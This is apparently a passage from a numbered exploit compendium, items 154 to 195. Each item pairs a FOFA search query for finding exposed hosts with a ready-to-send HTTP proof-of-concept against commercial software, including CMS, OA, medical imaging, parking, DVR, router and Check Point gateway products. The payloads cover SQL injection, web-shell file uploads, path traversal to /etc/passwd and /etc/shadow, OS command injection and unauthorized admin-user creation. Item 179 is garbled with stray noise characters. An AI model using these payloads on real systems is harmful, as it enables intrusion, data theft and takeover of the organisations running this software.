{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the cached file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特 CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle location monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

6 \5 ~2 n1 d% x+ m179. 建文工程管理系统存在任意文件读取# @: m/ x8 v/ J! F2 z+ q' x
POST /Common/DownLoad2.aspx HTTP/1.1
" K2 |& m8 I5 J" ^! L! XHost: {{Hostname}}, Q& o. B! n3 X# h- U
Content-Type: application/x-www-form-urlencoded' M7 G4 ~% ]  r
User-Agent: Mozilla/5.03 S, f; b: N) q/ H9 ]# a

, {2 `# o5 v5 `: j0 y% wpath=../log4net.config&Name=4 S: y% A/ N$ q) {( V
+ T5 T! {: F' n& I
% M6 k/ I6 G$ d  m3 Q
180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability exists.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
